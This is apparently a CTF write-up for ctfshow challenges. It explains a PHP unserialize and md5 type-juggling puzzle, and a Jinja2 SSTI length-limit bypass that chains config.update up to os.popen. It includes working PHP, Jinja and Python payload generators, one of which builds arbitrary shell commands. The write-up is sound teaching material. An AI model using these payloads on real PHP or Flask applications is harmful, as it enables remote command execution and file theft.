Sign-in: Fun PHP (签到·好玩的PHP)
```php
<?php
error_reporting(0);
highlight_file(__FILE__);

class ctfshow {
    private $d = '';
    private $s = '';
    private $b = '';
    private $ctf = '';

    public function __destruct() {
        $this->d = (string)$this->d;
        $this->s = (string)$this->s;
        $this->b = (string)$this->b;

        if (($this->d != $this->s) && ($this->d != $this->b) && ($this->s != $this->b)) {
            $dsb = $this->d.$this->s.$this->b;
            if ((strlen($dsb) <= 3) && (strlen($this->ctf) <= 3)) {
                if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) {
                    if (md5($dsb) === md5($this->ctf)) {
                        echo file_get_contents("/flag.txt");
                    }
                }
            }
        }
    }
}

unserialize($_GET["dsbctf"]);
```
This can be passed directly with 123. Only `$d`, `$s` and `$b` are cast to strings; `$ctf` is left alone, so an integer `123` makes `$dsb = "123"` and `$ctf = 123` differ under the strict `!==` check (different types), while `md5()` casts its argument to a string and `md5("123") === md5(123)`. `strlen(123)` is also 3, since without `strict_types` the integer is coerced.
```php
<?php
// The target declares d, s, b and ctf as private, but a payload built with
// public properties still works: since PHP 7.1 unserialize() maps a plain
// property name onto the declared (private) property of the same name.
class ctfshow {
    public $d = '';
    public $s = '';
    public $b = '';
    public $ctf = '';
}

$a = new ctfshow();
$a->ctf = 123;   // integer: "123" !== 123, yet md5(123) === md5("123")
$a->d = "1";
$a->s = "2";
$a->b = "3";     // three distinct one-byte strings, so $dsb === "123"
echo urlencode(serialize($a));
```
The special float values NAN and INF also work. `(string)INF` is the three-byte string `"INF"`, while `$ctf = INF` stays a float, so `"INF" !== INF` holds and `md5(INF)` hashes the string `"INF"`. With NAN the three parts must still be pairwise different under `!=`, so `'N'`, `'A'`, `'N'` fails on `$d != $b`; split `"NAN"` unevenly instead, for example `'NA'`, `'N'`, `''`.
```php
<?php
// Same trick with a float: (string)INF === "INF" is three bytes, but INF
// itself is a float, so "INF" !== INF while md5(INF) === md5("INF").
class ctfshow {
    private $d = 'I';
    private $s = 'N';
    private $b = 'F';
    private $ctf = INF;
}

$dsbctf = new ctfshow();
// Private names are serialized as "\0ctfshow\0d"; urlencode() turns the NUL bytes into %00.
echo urlencode(serialize($dsbctf));
```
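To make the bytes the two generators above emit visible without a PHP interpreter, here is an added Python example (not code from the original writeup) that serializes the same two `ctfshow` payloads by hand: the `"\0Class\0name"` mangling of private property names, the `s:`/`i:`/`d:` type tags, and `INF`/`NAN` written as floats. The helper names (`php_serialize_object`, `dsbctf_payload`, and so on) are my own, and only the scalar types this challenge needs are handled.

```python
"""Craft the ctfshow deserialization payloads by hand (added example)."""
import math
from urllib.parse import quote


def php_str(s: str) -> str:
    """serialize() of a PHP string; the length prefix counts bytes, not characters."""
    return f's:{len(s.encode())}:"{s}";'


def php_scalar(v) -> str:
    """serialize() of a bool, int, float or str."""
    if isinstance(v, bool):
        return "b:1;" if v else "b:0;"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, float):
        # PHP writes the special values literally; the challenge relies on
        # (string)INF === "INF" being exactly three bytes.
        if math.isnan(v):
            return "d:NAN;"
        if math.isinf(v):
            return "d:INF;" if v > 0 else "d:-INF;"
        text = repr(v)
        return f"d:{text[:-2] if text.endswith('.0') else text};"  # 1.0 -> d:1;
    if isinstance(v, str):
        return php_str(v)
    raise TypeError(f"unsupported type {type(v).__name__}")


def mangle(cls: str, name: str, visibility: str) -> str:
    """Property-name mangling PHP uses inside serialized objects."""
    if visibility == "public":
        return name
    if visibility == "protected":
        return "\0*\0" + name
    if visibility == "private":
        return f"\0{cls}\0{name}"
    raise ValueError(f"unknown visibility {visibility!r}")


def php_serialize_object(cls: str, props: dict, visibility: str = "public") -> str:
    """serialize() of an object whose properties all share one visibility."""
    body = "".join(
        php_str(mangle(cls, name, visibility)) + php_scalar(value)
        for name, value in props.items()
    )
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'


def dsbctf_payload(props: dict, visibility: str = "public") -> str:
    """The GET parameter value: urlencode(serialize($obj)), with every reserved
    byte (including the NUL bytes of private names) percent-encoded."""
    return quote(php_serialize_object("ctfshow", props, visibility), safe="")


# The writeup's two payloads: public properties with an integer ctf, and
# private properties with a float INF ctf.
PAYLOAD_123 = dsbctf_payload({"d": "1", "s": "2", "b": "3", "ctf": 123})
PAYLOAD_INF = dsbctf_payload({"d": "I", "s": "N", "b": "F", "ctf": float("inf")}, "private")

if __name__ == "__main__":
    print(PAYLOAD_123)
    print(PAYLOAD_INF)
```

The URL-encoding step matters for the private variant: the NUL bytes in `\0ctfshow\0d` would otherwise be dropped or mangled by most clients, and a missing byte also breaks the `s:10:` length prefix, so `unserialize()` fails silently and `__destruct()` never runs.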
ez_inject
I set this one myself.
ezzz_ssti
The length limit on a single payload can be bypassed with one object, `config`: its `update` method stores arbitrary values in the Flask config dict, so each request stores one more intermediate object under a short key and the next request picks it up as `config.<key>`. The `config.a` lookups work because Jinja2's attribute access falls back to item access (`config['a']`) when no attribute of that name exists.
Each statement below is sent as its own request:

```jinja
{# config["a"] now holds the update method of the global config object #}
{%set x=config.update(a=config.update)%}
{# config["f"] = lipsum.__globals__ #}
{%set x=config.a(f=lipsum.__globals__)%}
{# config["o"] = lipsum.__globals__.os #}
{%set x=config.a(o=config.f.os)%}
{# config["p"] = lipsum.__globals__.os.popen #}
{%set x=config.a(p=config.o.popen)%}
{{config.p("ls /").read()}}

{# debugging: print every key/value pair in the config dict, or just config["o"] #}
{%print(config)%}
{%print(config.o)%}
```
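As an added example (not code from the original writeup), the following Python script generates that chain as a list of short statements and checks that each one fits under a per-request length limit. The limit of 40 is an assumption, since the writeup does not state the real one; the hops (`lipsum.__globals__` to `os` to `popen`) are the writeup's own. It goes one step beyond the writeup: `store_string` assembles a command longer than the limit in `config["c"]` piece by piece using Jinja2's `~` concatenation, so the final `{{ }}` expression stays short. Function names are mine.

```python
"""Chained config.update() SSTI payload generator (added example)."""

# Alias config.update as config["a"]; Jinja2 resolves config.a to config["a"]
# because attribute lookup falls back to item lookup.
BOOTSTRAP = "{%set x=config.update(a=config.update)%}"

# (key, expression) hops from the writeup; each one reads the previous key.
HOPS = [
    ("f", "lipsum.__globals__"),
    ("o", "config.f.os"),
    ("p", "config.o.popen"),
]


def store(key: str, expr: str) -> str:
    """One statement storing the value of `expr` under config[key]."""
    return "{%set x=config.a(" + key + "=" + expr + ")%}"


def store_string(key: str, value: str, limit: int) -> list[str]:
    """Store `value` under config[key] in chunks, each statement <= limit,
    by appending every chunk to the accumulator with Jinja2's `~` operator."""
    if '"' in value or "\\" in value:
        raise ValueError("quotes/backslashes inside the literal are not handled")
    # Size of an appending statement carrying an empty chunk; the rest is payload.
    overhead = len(store(key, "config." + key + '~""'))
    chunk_len = limit - overhead
    if chunk_len < 1:
        raise ValueError(f"limit {limit} leaves no room for string chunks")
    stmts = []
    for start in range(0, max(len(value), 1), chunk_len):
        literal = '"' + value[start:start + chunk_len] + '"'
        expr = literal if not stmts else "config." + key + "~" + literal
        stmts.append(store(key, expr))
    return stmts


def check_limit(stmts: list[str], limit: int) -> list[str]:
    """Fail loudly if any single request would exceed the limit."""
    for s in stmts:
        if len(s) > limit:
            raise ValueError(f"{len(s)} chars > {limit}: {s}")
    return stmts


def writeup_chain(limit: int = 40) -> list[str]:
    """The exact sequence from the writeup, ending in `ls /`."""
    stmts = [BOOTSTRAP] + [store(k, e) for k, e in HOPS]
    stmts.append('{{config.p("ls /").read()}}')
    return check_limit(stmts, limit)


def long_command_chain(cmd: str, limit: int = 40) -> list[str]:
    """Same chain, but the command is assembled in config["c"] first, so a
    command longer than the limit can still be run."""
    stmts = [BOOTSTRAP] + [store(k, e) for k, e in HOPS]
    stmts += store_string("c", cmd, limit)
    stmts.append("{{config.p(config.c).read()}}")
    return check_limit(stmts, limit)


if __name__ == "__main__":
    for line in long_command_chain("cat /flag.txt"):
        print(len(line), line)
```

With a limit of 40 the bootstrap statement is exactly 40 characters, which is why the alias `a` is created in the very first request: every later statement is shorter because `config.a(` replaces `config.update(`.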
Thick Fog (迷雾重重)